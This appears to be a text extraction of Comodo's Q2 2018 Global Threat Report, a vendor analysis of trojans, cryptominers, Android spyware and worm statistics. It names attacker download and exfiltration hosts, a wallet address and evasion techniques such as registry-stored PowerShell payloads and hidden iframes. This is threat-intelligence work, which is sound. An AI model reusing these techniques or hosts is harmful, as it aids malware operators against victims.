Global Threat Report - comodo.com · Global Threat Report Q2 2018 Edition Page 4 of 73 2 Trojans...

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

copy 2018 All Rights Reserved Comodo Security Solutions Inc

Global Threat Report

Brought to you by

Q2 2018 Edition

Global Threat Report Q2 2018 Edition

of 73

Table of Contents

Contents 1 EXECUTIVE SUMMARY 3

11 OVERVIEW 3 12 NEW TRENDS 3

121 Trojans jumped to the top of the malware list 3 122 Cryptominers evolved into multifunctional malware 3 123 Android malware skyrocketed in variety 3 124 Geopolitical intelligence 3

2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA 4

21 THE MOST WIDESPREAD TROJAN 7 22 POWERSHELL-BASED ATTACK WITH EMOTET 8 23 FLAWED AMMYY RAT ATTACK BASED ON LEGITIMATE SOFTWARE 12 24 THE GROWTH OF FLAWED AMMYY ATTACKS FOR Q2 15 25 AMMYY ADMIN DISSEMINATION AROUND THE WORLD FOR Q2 15

3 CRYPTOMINER EVOLUTION 16

GOING FILELESS KILLING COMPETITORS CRASHING SYSTEMS 16 31 BADSHELL ATTACKS ENTERPRISES 16 32 WINSTARNSSMMINER A SYSTEM KILLER 19 33 COINMINER KILLS RIVALS 20 34 COINHIVE CHANGES ITS SKIN 22 35 CRYPTOCURRENCY CLIPBOARD HIJACKER INTERCEPTS TRANSFERS24

4 ANDROID DEVICES UNDER SIEGE 26

41 SPYING STEALING MINING 26 411 KevDroid 27 412 Zoo Park 29 413 MikeSpy 30 414 Xloader 30 415 Stalker Spy 31 416 Mystery Bot 32 417 FakeSpy 33 418 RedAlert 34 419 Hero Rat 34 4110 Sonvpay 35 4111 CoinHive 36

42 ANDROID MALWARE CATALOGUED BY MONTH 37 421 April 2018 37 422 May 2018 37 423 June 2018 38


Page 2 of 73

5 MALWARE IN Q2 2018 THE BIG PICTURE 39

51 STRATEGIC THREAT COMPUTER WORMS 40 511 Generic Worms 41 512 Net Worms 42 513 Email Worms 43 514 p2p Worms 44 515 IM Worms 45

52 HIGH THREAT MALWARE 46 521 Backdoors 47 522 Viruses 48 523 Trojans 49 524 Exploits 50

53 MEDIUM THREAT MALWARE 51 531 Constructor 52 532 Packers 53 533 Email Flooder 54 534 Virtual Tools 55 535 Jokes 56

54 LOW THREAT MALWARE APPLICATIONS 57 541 Applications 58 542 Unwanted Applications 59 543 Unsafe Applications 60

6 VERTICAL ANALYSIS 61

7 GEOPOLITICAL INTELLIGENCE 63

71 USA 63 72 CHINA 64 73 SOUTH KOREA 65 74 NORTH KOREA 66 75 ARMENIA 67 76 BELARUS 68 77 IRAQ 69 78 UKRAINE 70 79 CROATIA 71 710 FINLAND RUSSIA USA 72

8 CONCLUSIONS 73


Page 3 of 73

1 Executive summary

11 Overview

bull In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world bull The malware was detected in 237 countriesrsquotop-level domains bull Russia Turkey and India were the countries with the highest number of worm infections bull The United Kingdom had the highest proportion of detected backdoors bull Ukraine and Russia were the most common countries of detection for viruses bull Germany was the 1 country hit by trojans

12 New Trends 121 Trojans jumped to the top of the malware list The most dangerous sign is the unfolding merger of trojans and phishing emails that amplifies the spreading of the malware Attackers use trojans to deliver other malware and the Trojans surge accompanies a significant increase in other malware infections As such users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity

122 Cryptominers evolved into multifunctional malware Cryptomining decreased in quantity but grew in harmful capabilities As events in Q2 demonstrated this genre of malware is actively developing in two directions better hiding and stronger persistence Cryptominers have gained new features that let them fight antiviruses and deeply root in usersrsquo systems

123 Android malware skyrocketed in variety In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development Android devices have become attractive targets for cybercriminals because modern mobile device represents a treasure trove of data Spyware takes the lead in Android malware types Like real-world spies Android spyware constantly changes guises and methods of avoiding detection And its harmful potential goes up with every new version

124 Geopolitical intelligence Cyberattacks and malware spikes are often correlated with significant events in world politics Assignments of the US Secretary of State and CIA Director Armeniarsquos political revolution the Donald Trump and Vladimir Putin summit in Helsinki the Champions League final in Ukraine US - South Korean joint military exercises the anniversary of the 1989 Tiananmen Square protests and other events during Q2-2018 clearly demonstrate the existence of such correlations


Page 4 of 73

2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics

Malware Distribution by Type

Why are these changes inevitable

Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems

Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor

Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside


Page 5 of 73

Distribution of top 30 Malware Families

In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity

For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type

Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware

TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo

TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server


Page 6 of 73

TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products

TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email

Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community

First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers

The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans

Distribution of Phishing Families of Malware


Page 7 of 73

21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document

If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system

It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp

The phishing email


Page 8 of 73

22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools

Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies

The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust

The phishing email


Page 9 of 73

The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution

The special option to convince the victims to turn on VBScript execution


Page 10 of 73

The purpose of the VBScript is to launch PowerShell


Page 11 of 73

The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY

At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)

The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence

The malware creates ldquolanesviewerrdquo service to ensure persistence


Page 12 of 73

And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server

The next example is even more cunning because it infects computers with popular legitimate Microsoft software

23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief

Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work

The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly


Page 13 of 73

As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware

The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc

The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time


Page 14 of 73

Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot

The phishing email

IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel

The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell

Malware runs PowerShell


Page 15 of 73

Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack

24 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users

Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses

To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution

43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73

3 Cryptominer Evolution

Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted

But Q2 events clearly showed that the situation has radically changed

New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware

31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect

Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase

Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance


Page 17 of 73

Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works

If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script

BadShell at work


Page 18 of 73

The malicious code in the registry


Page 19 of 73

This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible

Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software

Below is another cunning technique that turns an infected machine into a slave of the attacker

32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally

The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them

The malicious code disguised as svhostexe

Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen

WinstarNssmMiner spreading around the world


Page 20 of 73


Cryptominers can kill not only victimsrsquo system but their cryptomining competitors

33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes

CoinMiner kills its rivals as follows

The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process


Page 21 of 73

The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers

In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency


Page 22 of 73

Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them

34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you

As you can see the CoinHive script is easily detected

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners


Page 23 of 73

As a result the malicious code on a webpage looks like this

The obfuscated malicious code on a webpage

If we decode the string we encounter an iframe

The iframe loads the URL shortener

The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible

Now letrsquos see at the URL httpscnhvco

And there we can find the familiar link to CoinHive

The link to CoinHive


Page 24 of 73

What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins

The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly

35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator

Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage

Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands

New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses

This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them

Here is an example of a clipboard hijacker attack

A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm


Page 25 of 73

An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors


Page 26 of 73

4 Android Devices Under Siege

41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner

If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business

Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph

The digital spooks


Page 27 of 73

Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version

411 KevDroid The first is named KevDroid Itrsquos distributed in three versions

Version-1 Naver Defender

Version-2 Netease Defender

Version-3

PU

Disguises of KevDroid

The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name

The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server

Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information

People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to


Page 28 of 73

cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device


Page 29 of 73

412 Zoo Park The next member of the spy family Zoo Park has 4 different versions

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content

The third version is included in spyware named ldquoSpymaster Prordquo and can

Enable and disable the GPS services

Record audio and send it to Command amp Control server

Upload image files

Collect information about the application installed

Collect browserrsquos data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc


Page 30 of 73

In addition to the abilities of previous versions it includes some additional tricks

Extracts photos audios and videos

Records screen

Executes shell commands

Records calls

413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities

Takes control over Bluetooth Adapter

Extracts data about accounts contacts details installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads collected data to the cybercriminalsrsquo server via FTP

414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome

Version-1 to Version-3 FaceBook Chrome

Disguises of Xloader


Page 31 of 73

After infection Xloader connects to its CampC server and executes the following commands

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands


Enable and disable a Wi-Fi connection

Access to a location specified by attackers

Make records

Make calls

415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Page 32 of 73

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy

416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo

Version 1 Adobe Flash Player

Version2 Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device


Page 33 of 73

Send_SMS mdash extract SMS content and set it to CampC server

Send_USSD mdash send the USSD to CampC server

Gethistory mdash monitor browser history

Start_AllApp mdash gather info about installed applications

Send_call mdash set the Intent action to call

Forward_call mdash forward incoming calls

ResForward_call mdash reset the forward calls

Go_Smsmnd mdash delete SMS content

Go_GetAlls mdashget SMS History

Dell_sms mdash delete SMS content in a conversation

Send_spam mdash send spam SMS

Start_Inject mdash call injectors class

417 FakeSpy FakeSpy also has many masks that you can see in the screenshot

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp

Here are some commands from its Command and Control server

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


Page 34 of 73

418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube

419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


Page 35 of 73

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold

After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality

Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market

4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Page 36 of 73

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order

It comes to victims in a variety of disguises named below

4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via hellip another cryptominer named CoinMiner

How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief

This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds


Page 37 of 73

42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months

421 April 2018

Android-targeted malware on April

422 May 2018

Android targeted malware on May

020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018

Android-targeted malware on June

0

50000

100000

150000

200000

250000

300000


Page 39 of 73

5 Malware in Q2 2018 The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world


Page 40 of 73

51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once


Page 41 of 73

511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector

Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more

The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections

And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018


Page 42 of 73

512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet

In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2

The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter


Page 43 of 73

513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality

This quarter the most common Email Worm by far was Runonce

The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)

This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2


Page 44 of 73

514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware

Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many


Page 45 of 73

515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically

During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below

This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm

This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries


Page 46 of 73

52 High Threat Malware

In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security


Page 47 of 73

